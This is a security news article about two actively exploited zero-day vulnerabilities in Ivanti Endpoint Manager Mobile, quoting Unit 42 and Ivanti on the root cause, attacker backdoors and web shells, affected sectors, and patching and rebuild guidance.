Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM). These vulnerabilities allow unauthorized individuals to gain control of enterprise mobile device management systems and to install backdoors that can persist even after organizations apply available patches.
According to Palo Alto Networks’ Unit 42 threat research team, “Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, impacting enterprise mobile fleets and corporate networks. These vulnerabilities enable unauthenticated attackers to remotely execute arbitrary code on target servers, granting them complete control over mobile device management (MDM) infrastructure without requiring user interaction or valid credentials.”
EPMM, previously known as MobileIron Core, is a platform used by enterprises to manage and enforce security policies on employee smartphones and tablets.
Palo Alto Networks’ attack surface management platform, Cortex Xpanse, has identified over 4,400 EPMM instances currently exposed on the public internet. If compromised, attackers could gain access to device policies, credentials, and metadata across an organization’s entire mobile fleet.
Both vulnerabilities carry a CVSS score of 9.8, allowing unauthorized attackers to execute arbitrary commands on exposed EPMM servers without user interaction or valid credentials.
Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. “We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” the company stated in its security advisory.
According to Unit 42, both vulnerabilities arise from unsafe Bash script handling in outdated Apache web server configurations. CVE-2026-1281 targets the In-House Application Distribution feature, while CVE-2026-1340 exploits a similar flaw through a separate script managing the Android File Transfer mechanism. “Although the root cause is the same, they reside in two distinct scripts handling different features,” the advisory explained.
From Scan to Backdoor
Unit 42 has documented instances where threat actors swiftly transition from automated scanning to gaining initial access, quickly escalating to deploy persistent backdoors designed to outlast patching efforts.
Once initial access is achieved, attackers typically attempt to download and execute a second-stage payload. “This second stage usually installs a web shell, a cryptominer, or a persistent backdoor to maintain control of the appliance,” the advisory noted.
Unit 42 also reported that attackers have utilized the Nezha open-source monitoring agent to retain visibility over compromised systems. The sectors targeted include state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada.
Moreover, Unit 42 cautioned that proof-of-concept exploit code for both CVEs is already publicly available, increasing the likelihood of broader exploitation as more threat actors adopt effective exploits.
Patch, but Verify First
Unit 42 has directed organizations to refer to Ivanti’s security advisory for remediation guidance. The advisory recommends applying version-specific RPM patches for EPMM 12.x branches that require no appliance downtime. However, Ivanti has cautioned that the patch does not persist through a version upgrade and must be reinstalled if the software is updated. “The permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.”
Ivanti also warned that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM possesses command execution permissions on connected Sentry systems. “If an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,” the company advised.
For organizations suspecting compromise, Ivanti’s advisory suggests against attempting to clean affected systems. Instead, it recommends restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates. With proof-of-concept exploit code already publicly available for both CVEs, broader exploitation is anticipated as more threat actors begin to utilize working exploits.
A Familiar Pattern
The targeting of EPMM follows a trend that will be recognizable to Ivanti customers. This product has previously been exploited on a large scale. In 2023, state-sponsored attackers utilized EPMM zero-days to infiltrate Norwegian government networks, while separate flaws were exploited in the wild last year.
Ivanti’s Connect Secure VPN product has also faced similar challenges, with Chinese APT groups exploiting zero-days in consecutive campaigns. This ultimately led the US government to mandate the disconnection of Ivanti VPN products from federal agencies entirely in February 2024.
